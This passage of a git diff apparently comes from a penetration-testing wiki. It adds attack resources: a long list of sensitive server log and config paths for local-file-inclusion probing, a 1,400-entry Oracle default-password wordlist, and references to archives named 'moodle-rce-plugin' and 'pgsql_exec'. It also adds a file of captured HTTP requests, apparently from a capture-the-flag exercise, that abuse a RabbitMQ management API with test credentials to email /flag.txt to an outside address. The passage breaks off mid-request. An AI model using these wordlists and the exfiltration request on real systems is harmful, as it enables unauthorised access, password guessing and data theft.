+/var/adm/ras/errlog +/var/adm/sulog +/var/adm/SYSLOG +/var/adm/utmp +/var/adm/utmpx +/var/adm/vold.log +/var/adm/wtmp +/var/adm/wtmpx +/var/adm/X0msgs +/var/apache/conf/httpd.conf +/var/cpanel/cpanel.config +/var/cpanel/tomcat.options +/var/cron/log +/var/data/mysql-bin.index +/var/lib/mysql/my.cnf +/var/lib/pgsql/data/postgresql.conf +/var/lib/squirrelmail/prefs/squirrelmail.log +/var/lighttpd.log +/var/local/www/conf/php.ini +/var/log/access.log +/var/log/access_log +/var/log/apache2/access.log +/var/log/apache2/access_log +/var/log/apache2/error.log +/var/log/apache2/error_log +/var/log/apache2/squirrelmail.err.log +/var/log/apache2/squirrelmail.log +/var/log/apache/access.log +/var/log/apache/access_log +/var/log/apache/error.log +/var/log/apache/error_log +/var/log/auth.log +/var/log/authlog +/var/log/boot.log +/var/log/cron/var/log/postgres.log +/var/log/daemon.log +/var/log/daemon.log.1 +/var/log/data/mysql-bin.index +/var/log/dmessage +/var/log/error.log +/var/log/error_log +/var/log/exim/mainlog +/var/log/exim_mainlog +/var/log/exim/paniclog +/var/log/exim_paniclog +/var/log/exim/rejectlog +/var/log/exim_rejectlog +/var/log/ftplog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/httpd-access.log +/var/log/httpd/access.log +/var/log/httpd/access_log +/var/log/httpd/error.log +/var/log/httpd/error_log +/var/log/ipfw +/var/log/ipfw/ipfw.log +/var/log/ipfw.log +/var/log/ipfw.today +/var/log/kern.log +/var/log/kern.log.1 +/var/log/lighttpd/ +/var/log/lighttpd.access.log +/var/log/lighttpd/access.log +/var/log/lighttpd/access.www.log +/var/log/lighttpd/{DOMAIN}/access.log +/var/log/lighttpd/{DOMAIN}/error.log +/var/log/lighttpd.error.log +/var/log/lighttpd/error.log +/var/log/lighttpd/error.www.log +/var/log/log.smb +/var/log/mail.err +/var/log/mail.info +/var/log/mail.log +/var/log/maillog +/var/log/mail.warn +/var/log/messages +/var/log/messages.1 +/var/log/muddleftpd +/var/log/muddleftpd.conf +/var/log/mysql-bin.index +/var/log/mysql/data/mysql-bin.index +/var/log/mysqlderror.log +/var/log/mysql.err +/var/log/mysql.log +/var/log/mysql/mysql-bin.index +/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql.log +/var/log/mysql/mysql-slow.log +/var/log/news.all +/var/log/news/news.all +/var/log/news/news.crit +/var/log/news/news.err +/var/log/news/news.notice +/var/log/news/suck.err +/var/log/news/suck.notice +/var/log/nginx.access_log +/var/log/nginx/access.log +/var/log/nginx/access_log +/var/log/nginx.error_log +/var/log/nginx/error.log +/var/log/nginx/error_log +/var/log/pgsql8.log +/var/log/pgsql_log +/var/log/pgsql/pgsql.log +/var/log/pm-powersave.log +/var/log/POPlog +/var/log/postgres/pg_backup.log +/var/log/postgres/postgres.log +/var/log/postgresql.log +/var/log/postgresql/main.log +/var/log/postgresql/postgres.log +/var/log/postgresql/postgresql-8.1-main.log +/var/log/postgresql/postgresql-8.3-main.log +/var/log/postgresql/postgresql-8.4-main.log +/var/log/postgresql/postgresql-9.0-main.log +/var/log/postgresql/postgresql-9.1-main.log +/var/log/postgresql/postgresql.log +/var/log/proftpd +/var/log/proftpd.access_log +/var/log/proftpd.xferlog +/var/log/proftpd/xferlog.legacy +/var/log/pureftpd.log +/var/log/pure-ftpd/pure-ftpd.log +/var/logs/access.log +/var/log/samba.log +/var/log/samba.log1 +/var/log/samba.log2 +/var/log/samba/log.nmbd +/var/log/samba/log.smbd +/var/log/squirrelmail.log +/var/log/sso/sso.log +/var/log/sw-cp-server/error_log +/var/log/syslog +/var/log/syslog.1 +/var/log/tomcat6/catalina.out +/var/log/ufw.log +/var/log/user.log +/var/log/user.log.1 +/var/log/vmware/hostd-1.log +/var/log/vmware/hostd.log +/var/log/vsftpd.log +/var/log/webmin/miniserv.log +/var/log/xferlog +/var/log/Xorg.0.log +/var/lp/logs/lpNet +/var/lp/logs/lpsched +/var/lp/logs/requests +/var/mail/root +/var/mysql-bin.index +/var/mysql.log +/var/nm2/postgresql.conf +/var/postgresql/db/postgresql.conf +/var/postgresql/log/postgresql.log +/var/saf/_log +/var/saf/port/log +/var/spool/cron/crontabs/root +/var/spool/cron/crontabs/root +/var/www/conf +/var/www/conf/httpd.conf +/var/www/html/squirrelmail/config/config.php +/var/www/.lighttpdpassword +/var/www/logs/access.log +/var/www/logs/access_log +/var/www/logs/error.log +/var/www/logs/error_log +/var/www/squirrelmail/config/config.php +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default +/wamp/bin/apache/apache2.2.21/conf/httpd.conf +/wamp/bin/apache/apache2.2.21/logs/access.log +/wamp/bin/apache/apache2.2.21/logs/error.log +/wamp/bin/apache/apache2.2.21/wampserver.conf +/wamp/bin/apache/apache2.2.22/conf/httpd.conf +/wamp/bin/apache/apache2.2.22/conf/wampserver.conf +/wamp/bin/apache/apache2.2.22/logs/access.log +/wamp/bin/apache/apache2.2.22/logs/error.log +/wamp/bin/apache/apache2.2.22/wampserver.conf +/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index +/wamp/bin/mysql/mysql5.5.16/my.ini +/wamp/bin/mysql/mysql5.5.16/wampserver.conf +/wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index +/wamp/bin/mysql/mysql5.5.24/my.ini +/wamp/bin/mysql/mysql5.5.24/wampserver.conf +/wamp/logs/access.log +/wamp/logs/apache_error.log +/wamp/logs/genquery.log +/wamp/logs/mysql.log +/wamp/logs/slowquery.log +/web/conf/php.ini +/WINDOWS/php.ini +/WINDOWS\php.ini +/WINDOWS/system32/logfiles/MSFTPSVC +/WINDOWS/system32/logfiles/MSFTPSVC1 +/WINDOWS/system32/logfiles/MSFTPSVC2 +/WINDOWS/system32/logfiles/SMTPSVC +/WINDOWS/system32/logfiles/SMTPSVC1 +/WINDOWS/system32/logfiles/SMTPSVC2 +/WINDOWS/system32/logfiles/SMTPSVC3 +/WINDOWS/system32/logfiles/SMTPSVC4 +/WINDOWS/system32/logfiles/SMTPSVC5 +/WINDOWS/system32/logfiles/W3SVC1/inetsvn1.log +/WINDOWS/system32/logfiles/W3SVC2/inetsvn1.log +/WINDOWS/system32/logfiles/W3SVC3/inetsvn1.log +/WINDOWS/system32/logfiles/W3SVC/inetsvn1.log +/WINNT/php.ini +/WINNT\php.ini +/WINNT/system32/logfiles/MSFTPSVC +/WINNT/system32/logfiles/MSFTPSVC1 +/WINNT/system32/logfiles/MSFTPSVC2 +/WINNT/system32/logfiles/SMTPSVC +/WINNT/system32/logfiles/SMTPSVC1 +/WINNT/system32/logfiles/SMTPSVC2 +/WINNT/system32/logfiles/SMTPSVC3 +/WINNT/system32/logfiles/SMTPSVC4 +/WINNT/system32/logfiles/SMTPSVC5 +/WINNT/system32/logfiles/W3SVC1/inetsvn1.log +/WINNT/system32/logfiles/W3SVC2/inetsvn1.log +/WINNT/system32/logfiles/W3SVC3/inetsvn1.log +/WINNT/system32/logfiles/W3SVC/inetsvn1.log +/www/apache/conf/httpd.conf +/www/conf/httpd.conf +/www/logs/freebsddiary-access_log +/www/logs/freebsddiary-error.log +/www/logs/proftpd.system.log +/xampp/apache/bin/php.ini +/xampp\apache\bin\php.ini +/xampp/apache/conf/httpd.conf +/xampp/apache/logs/access.log +/xampp/apache/logs/error.log +/xampp/FileZillaFTP/FileZilla Server.xml +/xampp/htdocs/aca.txt +/xampp/htdocs/admin.php +/xampp/htdocs/leer.txt +/xampp/MercuryMail/mercury.ini +/xampp/mysql/data/{HOST}.err +/xampp/mysql/data/mysql-bin.index +/xampp/mysql/data/mysql.err +/xampp/phpMyAdmin/config.inc.php +/xampp/php/php.ini +/xampp/sendmail/sendmail.ini +/xampp/sendmail/sendmail.log +/xampp/webalizer/webalizer.conf +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/2 +/proc/self/fd/3 +/proc/self/fd/4 +/proc/self/fd/5 +/proc/self/fd/6 +/proc/self/fd/7 +/proc/self/fd/8 +/proc/self/fd/9 +/proc/self/fd/10 +/proc/self/fd/11 +/proc/self/fd/12 +/proc/self/fd/13 +/proc/self/fd/14 +/proc/self/fd/15 +/proc/self/fd/16 +/proc/self/fd/17 +/proc/self/fd/18 +/proc/self/fd/19 +/proc/self/fd/20 +/proc/self/fd/21 +/proc/self/fd/22 +/proc/self/fd/23 +/proc/self/fd/24 +/proc/self/fd/25 +/proc/self/fd/26 +/proc/self/fd/27 +/proc/self/fd/28 +/proc/self/fd/29 +/proc/self/fd/30 +/proc/self/fd/31 +/proc/self/fd/32 +/proc/self/fd/33 +/proc/self/fd/34 +/proc/self/fd/35 +/proc/self/fd/36 +/proc/self/fd/37 +/proc/self/fd/38 +/proc/self/fd/39 +/proc/self/fd/40 +/proc/self/fd/41 +/proc/self/fd/42 +/proc/self/fd/43 +/proc/self/fd/44 +/proc/self/fd/45 +/proc/self/fd/46 +/proc/self/fd/47 +/proc/self/fd/48 +/proc/self/fd/49 +/proc/self/fd/50 +/proc/self/fd/51 +/proc/self/fd/52 +/proc/self/fd/53 +/proc/self/fd/54 +/proc/self/fd/55 +/proc/self/fd/56 +/proc/self/fd/57 +/proc/self/fd/58 +/proc/self/fd/59 +/proc/self/fd/60 +/proc/self/fd/61 +/proc/self/fd/62 +/proc/self/fd/63 +/proc/self/fd/64 +/proc/self/fd/65 +/proc/self/fd/66 +/proc/self/fd/67 +/proc/self/fd/68 +/proc/self/fd/69 +/proc/self/fd/70 +/proc/self/fd/71 +/proc/self/fd/72 +/proc/self/fd/73 +/proc/self/fd/74 +/proc/self/fd/75 +/proc/self/fd/76 +/proc/self/fd/77 +/proc/self/fd/78 +/proc/self/fd/79 +/proc/self/fd/80 +/proc/self/fd/81 +/proc/self/fd/82 +/proc/self/fd/83 +/proc/self/fd/84 +/proc/self/fd/85 +/proc/self/fd/86 +/proc/self/fd/87 +/proc/self/fd/88 +/proc/self/fd/89 +/proc/self/fd/90 +/proc/self/fd/91 +/proc/self/fd/92 +/proc/self/fd/93 +/proc/self/fd/94 +/proc/self/fd/95 +/proc/self/fd/96 +/proc/self/fd/97 +/proc/self/fd/98 +/proc/self/fd/99 +/proc/self/fd/100 diff --git a/src/images/mimidrv.png b/.gitbook/assets/mimidrv.png similarity index 100% rename from src/images/mimidrv.png rename to .gitbook/assets/mimidrv.png diff --git a/src/files/moodle-rce-plugin.zip b/.gitbook/assets/moodle-rce-plugin.zip similarity index 100% rename from src/files/moodle-rce-plugin.zip rename to .gitbook/assets/moodle-rce-plugin.zip diff --git a/.gitbook/assets/pass-oracle.txt b/.gitbook/assets/pass-oracle.txt new file mode 100644 index 00000000000..5c42de326e1 --- /dev/null +++ b/.gitbook/assets/pass-oracle.txt @@ -0,0 +1,1402 @@ +06071992 +0racl3 +0RACL3 +0racl38 +0RACL38 +0racl38i +0RACL38I +0racl39 +0RACL39 +0racl39i +0RACL39I +0racle +0RACLE +0racle8 +0RACLE8 +0racle8i +0RACLE8I +0racle9 +0RACLE9 +0racle9i +0RACLE9I +199220706 +AASH +ABA1 +abm +ABM +adgangskode +ADGANGSKODE +adldemo +ADLDEMO +admin +ADMIN +administrator +ADMINISTRATOR +ADS +ahl +AHL +ahm +AHM +airoplane +AIROPLANE +ak +AK +akf7d98s2 +AKF7D98S2 +AL +ALA1 +ALLUSERS +alr +ALR +AMA1 +AMA2 +AMA3 +AMA4 +AMF +ams +AMS +AMS1 +AMS2 +AMS3 +AMS4 +AMSYS +amv +AMV +AMW +ANNE +anonymous +ANONYMOUS +AOLDEMO +ap +AP +APA1 +APA2 +APA3 +APA4 +APPLEAD +applmgr +APPLMGR +applsys +APPLSYS +applsyspub +APPLSYSPUB +apppassword +APPPASSWORD +apps +APPS +APS1 +APS2 +APS3 +APS4 +aq +AQ +aqdemo +AQDEMO +aqjava +AQJAVA +aquser +AQUSER +ar +AR +ARA1 +ARA2 +ARA3 +ARA4 +ARS1 +ARS2 +ARS3 +ARS4 +ART +asf +ASF +asg +ASG +asl +ASL +ASN +aso +ASO +asp +ASP +ast +AST +AUC_GUEST +audiouser +AUDIOUSER +AUTHORIA +ax +AX +az +AZ +B2B +BAM +bar +BAR +bc4j +BC4J +BCA1 +BCA2 +ben +BEN +bic +BIC +bil +BIL +bim +BIM +bis +BIS +biv +BIV +bix +BIX +blewis +BLEWIS +BMEADOWS +BNE +bom +BOM +BP01 +BP02 +BP03 +BP04 +BP05 +BP06 +brio_admin +BRIO_ADMIN +bsc +BSC +bug_reports +BUG_REPORTS +BUYACCT +BUYAPPR1 +BUYAPPR2 +BUYAPPR3 +BUYER +BUYMTCH +CAMRON +CANDICE +CARL +CARLY +CARMEN +CARRIECONYERS +CATADMIN +catalog +CATALOG +cct +CCT +cdemo82 +CDEMO82 +cdemo83 +CDEMO83 +cdemocor +CDEMOCOR +cdemorid +CDEMORID +cdemoucb +CDEMOUCB +cdouglas +CDOUGLAS +ce +CE +CEASAR +centra +CENTRA +central +CENTRAL +CFD +CHANDRA +change_on_install +CHANGE_ON_INSTALL +CHARLEY +CHRISBAKER +CHRISTIE +cids +CIDS +CINDY +cis +CIS +cisinfo +CISINFO +CLARK +CLAUDE +clave +CLAVE +clerk +CLERK +CLINT +CLN +cloth +CLOTH +cn +CN +CNCADMIN +company +COMPANY +compiere +COMPIERE +CONNIE +CONNOR +CORY +CRM1 +CRM2 +crp +CRP +CRPB733 +CRPCTL +CRPDTA +cs +CS +CSADMIN +CSAPPR1 +csc +CSC +csd +CSD +CSDUMMY +cse +CSE +csf +CSF +csi +CSI +csl +CSL +CSM +csmig +CSMIG +csp +CSP +csr +CSR +css +CSS +ctxdemo +CTXDEMO +ctxsys +CTXSYS +CTXTEST +cua +CUA +cue +CUE +cuf +CUF +cug +CUG +cui +CUI +cun +CUN +cup +CUP +cus +CUS +cz +CZ +DAVIDMORGAN +dbsnmp +DBSNMP +dbvision +DBVISION +DCM +DD7333 +DD7334 +DD810 +DD811 +DD812 +DD9 +DDB733 +DDD +demo +DEMO +demo8 +DEMO8 +demo9 +DEMO9 +des +DES +des2k +DES2K +dev2000_demos +DEV2000_DEMOS +DEVB733 +DEVUSER +dip +DIP +DISCOVERER5 +discoverer_admin +DISCOVERER_ADMIN +DKING +DLD +DMATS +DMS +dmsys +DMSYS +DOM +dpfpass +DPFPASS +DPOND +dsgateway +DSGATEWAY +dssys +DSSYS +d_syspw +D_SYSPW +d_systpw +D_SYSTPW +dtsp +DTSP +DV7333 +DV7334 +DV810 +DV811 +DV812 +DV9 +DVP1 +eaa +EAA +eam +EAM +east +EAST +ec +EC +ecx +ECX +EDR +EDWEUL_US +EDWREP +EGC1 +EGD1 +EGM1 +EGO +EGR1 +ejb +EJB +ejsadmin +EJSADMIN +ejsadmin_password +EJSADMIN_PASSWORD +emp +EMP +END1 +eng +ENG +eni +ENI +ENM1 +ENS1 +ENTMGR_CUST +ENTMGR_PRO +ENTMGR_TRAIN +EOPP_PORTALADM +EOPP_PORTALMGR +EOPP_USER +estore +ESTORE +EUL_US +event +EVENT +evm +EVM +EXA1 +EXA2 +EXA3 +EXA4 +example +EXAMPLE +exfsys +EXFSYS +EXS1 +EXS2 +EXS3 +EXS4 +extdemo +EXTDEMO +extdemo2 +EXTDEMO2 +fa +FA +fem +FEM +FIA1 +fii +FII +finance +FINANCE +finprod +FINPROD +flm +FLM +fnd +FND +fndpub +FNDPUB +FNI1 +FNI2 +FPA +fpt +FPT +frm +FRM +FTA1 +fte +FTE +FUN +fv +FV +FVP1 +GALLEN +GCA1 +GCA2 +GCA3 +GCA9 +GCMGR1 +GCMGR2 +GCMGR3 +GCS +GCS1 +GCS2 +GCS3 +GEORGIAWINE +gl +GL +GLA1 +GLA2 +GLA3 +GLA4 +GLS1 +GLS2 +GLS3 +GLS4 +gma +GMA +GM_AWDA +GM_COPI +gmd +GMD +GM_DPHD +gme +GME +gmf +GMF +gmi +GMI +gml +GML +GM_MLCT +gmp +GMP +GM_PLADMA +GM_PLADMH +GM_PLCCA +GM_PLCCH +GM_PLCOMA +GM_PLCOMH +GM_PLCONA +GM_PLCONH +GM_PLNSCA +GM_PLNSCH +GM_PLSCTA +GM_PLSCTH +GM_PLVET +gms +GMS +GM_SPO +GM_STKH +gpfd +GPFD +gpld +GPLD +gr +GR +GUEST +hades +HADES +HCC +hcpark +HCPARK +HHCFO +hlw +HLW +hobbes +HOBBES +hr +HR +hri +HRI +hvst +HVST +hxc +HXC +hxt +HXT +IA +iba +IBA +IBC +ibe +IBE +ibp +IBP +ibu +IBU +iby +IBY +icdbown +ICDBOWN +icx +ICX +idemo_user +IDEMO_USER +ieb +IEB +iec +IEC +iem +IEM +ieo +IEO +ies +IES +ieu +IEU +iex +IEX +ifssys +IFSSYS +igc +IGC +igf +IGF +igi +IGI +igs +IGS +igw +IGW +imageuser +IMAGEUSER +imc +IMC +imedia +IMEDIA +imt +IMT +INS1 +INS2 +instance +INSTANCE +inv +INV +invalid +INVALID +Invalid password +IP +ipa +IPA +ipd +IPD +iplanet +IPLANET +isc +ISC +ISTEWARD +itg +ITG +ja +JA +JD7333 +JD7334 +JD9 +JDE +JDEDBA +je +JE +jetspeed +JETSPEED +jg +JG +jl +JL +JL +jmuser +JMUSER +john +JOHN +JOHNINARI +jtf +JTF +JTI +jtm +JTM +JTR +jts +JTS +JUNK_PS +JUSTOSHUM +KELLYJONES +KEVINDONS +KPN +kwalker +KWALKER +l2ldemo +L2LDEMO +LADAMS +laskjdf098ksdaf09 +LASKJDF098KSDAF09 +LBA +lbacsys +LBACSYS +LDQUAL +LHILL +LIZARD +LNS +LQUINCY +LSA +manag3r +MANAG3R +manager +MANAGER +manprod +MANPROD +mddata +MDDATA +mddemo +MDDEMO +mddemo_mgr +MDDEMO_MGR +mdsys +MDSYS +me +ME +mfg +MFG +mgr +MGR +MGR1 +MGR2 +MGR3 +MGR4 +mgwuser +MGWUSER +migrate +MIGRATE +MIKEIKEGAMI +miller +MILLER +MJONES +MLAKE +MM1 +MM2 +MM3 +MM4 +MM5 +MMARTIN +mmo2 +MMO2 +mmo3 +MMO3 +moreau +MOREAU +mot_de_passe +MOT_DE_PASSE +mrp +MRP +msc +MSC +msd +MSD +mso +MSO +msr +MSR +MST +mt6ch5 +MT6CH5 +mtrpw +MTRPW +mts_password +MTS_PASSWORD +mtssys +MTSSYS +mumblefratz +MUMBLEFRATZ +mwa +MWA +mxagent +MXAGENT +names +NAMES +NEILKATSU +neotix_sys +NEOTIX_SYS +nneulpass +NNEULPASS +oas_public +OAS_PUBLIC +OBJ7333 +OBJ7334 +OBJB733 +OCA +ocitest +OCITEST +ocm_db_admin +OCM_DB_ADMIN +odm +ODM +ods +ODS +odscommon +ODSCOMMON +ods_server +ODS_SERVER +oe +OE +oemadm +OEMADM +oemrep +OEMREP +oem_temp +OEM_TEMP +okb +OKB +okc +OKC +oke +OKE +oki +OKI +OKL +oko +OKO +okr +OKR +oks +OKS +okx +OKX +OL810 +OL811 +OL812 +OL9 +olapdba +OLAPDBA +olapsvr +OLAPSVR +olapsys +OLAPSYS +ont +ONT +oo +OO +openspirit +OPENSPIRIT +opi +OPI +ORABAM +ORABAMSAMPLES +ORABPEL +oracache +ORACACHE +oracl3 +ORACL3 +oracle +ORACLE +oracle8 +ORACLE8 +oracle8i +ORACLE8I +oracle9 +ORACLE9 +oracle9i +ORACLE9I +oradbapass +ORADBAPASS +ORAESB +ORAOCA_PUBLIC +oraprobe +ORAPROBE +oraregsys +ORAREGSYS +ORASAGENT +orasso +ORASSO +orasso_ds +ORASSO_DS +orasso_pa +ORASSO_PA +orasso_ps +ORASSO_PS +orasso_public +ORASSO_PUBLIC +orastat +ORASTAT +ordcommon +ORDCOMMON +ordplugins +ORDPLUGINS +ordsys +ORDSYS +osm +OSM +osp22 +OSP22 +ota +OTA +outln +OUTLN +owa +OWA +OWAPUB +owa_public +OWA_PUBLIC +owf_mgr +OWF_MGR +owner +OWNER +ozf +OZF +ozp +OZP +ozs +OZS +pa +PA +PABLO +PAIGE +PAM +panama +PANAMA +paper +PAPER +parol +PAROL +PARRISH +PARSON +passwd +PASSWD +passwo1 +PASSWO1 +passwo2 +PASSWO2 +passwo3 +PASSWO3 +passwo4 +PASSWO4 +password +PASSWORD +PAT +PATORILY +PATRICKSANCHEZ +patrol +PATROL +PATSY +paul +PAUL +PAULA +PAXTON +PCA1 +PCA2 +PCA3 +PCA4 +PCS1 +PCS2 +PCS3 +PCS4 +PD7333 +PD7334 +PD810 +PD811 +PD812 +PD9 +PDA1 +PEARL +PEG +PENNY +PEOP1E +PERCY +perfstat +PERFSTAT +PERRY +perstat +PERSTAT +PETE +PEYTON +PHIL +PJI +pjm +PJM +planning +PLANNING +plex +PLEX +pm +PM +pmi +PMI +pn +PN +po +PO +po7 +PO7 +po8 +PO8 +poa +POA +POLLY +pom +POM +PON +PORTAL +portal30 +PORTAL30 +portal30_admin +PORTAL30_ADMIN +portal30_demo +PORTAL30_DEMO +portal30_ps +PORTAL30_PS +portal30_public +PORTAL30_PUBLIC +portal30_sso +PORTAL30_SSO +portal30_sso_admin +PORTAL30_SSO_ADMIN +portal30_sso_ps +PORTAL30_SSO_PS +portal30_sso_public +PORTAL30_SSO_PUBLIC +portal31 +PORTAL31 +PORTAL_APP +portal_demo +PORTAL_DEMO +PORTAL_PUBLIC +portal_sso_ps +PORTAL_SSO_PS +pos +POS +powercartuser +POWERCARTUSER +PPM1 +PPM2 +PPM3 +PPM4 +PPM5 +primary +PRIMARY +PRISTB733 +PRISTCTL +PRISTDTA +PRODB733 +PRODCTL +PRODDTA +PRODUSER +PRP +PS +PS810 +PS810CTL +PS810DTA +PS811 +PS811CTL +PS811DTA +PS812 +PS812CTL +PS812DTA +psa +PSA +psb +PSB +PSBASS +PSEM +PSFT +PSFTDBA +psp +PSP +PTADMIN +PTCNE +PTDMO +PTE +PTESP +PTFRA +PTG +PTGER +PTJPN +PTUKE +PTUPG +PTWEB +PTWEBSERVER +pub +PUB +pubsub +PUBSUB +pubsub1 +PUBSUB1 +pv +PV +PY7333 +PY7334 +PY810 +PY811 +PY812 +PY9 +qa +QA +qdba +QDBA +QOT +qp +QP +QRM +qs +QS +qs_adm +QS_ADM +qs_cb +QS_CB +qs_cbadm +QS_CBADM +qs_cs +QS_CS +qs_es +QS_ES +qs_os +QS_OS +qs_ws +QS_WS +re +RE +RENE +repadmin +REPADMIN +reports +REPORTS +rep_owner +REP_OWNER +RESTRICTED_US +rg +RG +rhx +RHX +rla +RLA +rlm +RLM +RM1 +RM2 +RM3 +RM4 +RM5 +rmail +RMAIL +rman +RMAN +ROB +RPARKER +rrs +RRS +RWA1 +SALLYH +SAM +sample +SAMPLE +sampleatm +SAMPLEATM +sap +SAP +sapr3 +SAPR3 +SARAHMANDY +SCM1 +SCM2 +SCM3 +SCM4 +SDAVIS +sdos_icsap +SDOS_ICSAP +secdemo +SECDEMO +SEDWARDS +SELLCM +SELLER +SELLTREAS +senha +SENHA +serviceconsumer1 +SERVICECONSUMER1 +SETUP +sh +SH +shelves +SHELVES +SID +si_informtn_schema +SI_INFORMTN_SCHEMA +siteminder +SITEMINDER +SKAYE +SKYTETSUKA +slidepw +SLIDEPW +SLSAA +SLSMGR +SLSREP +snowman +SNOWMAN +spierson +SPIERSON +SRABBITT +SRALPHS +SRAY +SRIVERS +SSA1 +SSA2 +SSA3 +SSC1 +SSC2 +SSC3 +SSOSDK +ssp +SSP +SSS1 +starter +STARTER +steel +STEEL +strat_passwd +STRAT_PASSWD +supersecret +SUPERSECRET +SUPPLIER +support +SUPPORT +SVM7333 +SVM7334 +SVM810 +SVM811 +SVM812 +SVM9 +SVMB733 +SVP1 +swordfish +SWORDFISH +swpro +SWPRO +swuser +SWUSER +SY810 +SY811 +SY812 +SY9 +sympa +SYMPA +sys +SYS +SYS7333 +SYS7334 +sysadm +SYSADM +sysadmin +SYSADMIN +SYSB733 +sysman +SYSMAN +syspass +SYSPASS +sys_stnt +SYS_STNT +system +SYSTEM +systempass +SYSTEMPASS +tahiti +TAHITI +TDEMARCO +tdos_icsap +TDOS_ICSAP +tectec +TECTEC +test +TEST +TESTCTL +TESTDTA +testpilot +TESTPILOT +test_user +TEST_USER +thinsamplepw +THINSAMPLEPW +tibco +TIBCO +tiger +TIGER +tigger +TIGGER +tip37 +TIP37 +TRA1 +trace +TRACE +travel +TRAVEL +TRBM1 +TRCM1 +TRDM1 +TRRM1 +tsdev +TSDEV +tsuser +TSUSER +turbine +TURBINE +TWILLIAMS +UDDISYS +ultimate +ULTIMATE +um_admin +UM_ADMIN +um_client +UM_CLIENT +unknown +UNKNOWN +user +USER +user0 +USER0 +user1 +USER1 +user2 +USER2 +user3 +USER3 +user4 +USER4 +user5 +USER5 +user6 +USER6 +user7 +USER7 +user8 +USER8 +user9 +USER9 +utility +UTILITY +utlestat +UTLESTAT +vea +VEA +veh +VEH +vertex_login +VERTEX_LOGIN +VIDEO31 +VIDEO4 +VIDEO5 +videouser +VIDEOUSER +vif_dev_pwd +VIF_DEV_PWD +viruser +VIRUSER +VP1 +VP2 +VP3 +VP4 +VP5 +VP6 +vrr1 +VRR1 +vrr2 +VRR2 +WAA1 +WAA2 +WCRSYS +webcal01 +WEBCAL01 +webdb +WEBDB +webread +WEBREAD +welcome +WELCOME +WELCOME1 +WENDYCHO +west +WEST +wfadmin +WFADMIN +wh +WH +wip +WIP +WIRELESS +wkadmin +WKADMIN +wkproxy +WKPROXY +wksys +WKSYS +wk_test +WK_TEST +wkuser +WKUSER +wms +WMS +wmsys +WMSYS +wob +WOB +wood +WOOD +wps +WPS +wsh +WSH +wsm +WSM +www +WWW +wwwuser +WWWUSER +xademo +XADEMO +XDO +xdp +XDP +xla +XLA +XLE +XNB +xnc +XNC +xni +XNI +xnm +XNM +xnp +XNP +xns +XNS +xprt +XPRT +xtr +XTR +xxx +XXX +YCAMPOS +yes +YES +your_pass +YOUR_PASS +YSANCHEZ +ZFA +ZPB +ZSA +zwerg +ZWERG +ZX diff --git a/src/files/pgsql_exec.zip b/.gitbook/assets/pgsql_exec.zip similarity index 100% rename from src/files/pgsql_exec.zip rename to .gitbook/assets/pgsql_exec.zip diff --git a/.gitbook/assets/picklerick.gif b/.gitbook/assets/picklerick.gif new file mode 100644 index 00000000000..a0d85724612 Binary files /dev/null and b/.gitbook/assets/picklerick.gif differ diff --git a/.gitbook/assets/poison (1) (1) (1).jpg b/.gitbook/assets/poison (1) (1) (1).jpg new file mode 100644 index 00000000000..e3a0347c919 Binary files /dev/null and b/.gitbook/assets/poison (1) (1) (1).jpg differ diff --git a/.gitbook/assets/poison (1) (1).jpg b/.gitbook/assets/poison (1) (1).jpg new file mode 100644 index 00000000000..e3a0347c919 Binary files /dev/null and b/.gitbook/assets/poison (1) (1).jpg differ diff --git a/.gitbook/assets/portada-2.png b/.gitbook/assets/portada-2.png new file mode 100644 index 00000000000..5ce83d1ddb7 Binary files /dev/null and b/.gitbook/assets/portada-2.png differ diff --git a/.gitbook/assets/portada-alcoholica.png b/.gitbook/assets/portada-alcoholica.png new file mode 100644 index 00000000000..f23eaab54a2 Binary files /dev/null and b/.gitbook/assets/portada-alcoholica.png differ diff --git a/src/files/posts.txt b/.gitbook/assets/posts (1).txt similarity index 100% rename from src/files/posts.txt rename to .gitbook/assets/posts (1).txt diff --git a/.gitbook/assets/posts.txt b/.gitbook/assets/posts.txt new file mode 100644 index 00000000000..c64dc9f52b3 --- /dev/null +++ b/.gitbook/assets/posts.txt @@ -0,0 +1,7703 @@ +PNG +POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 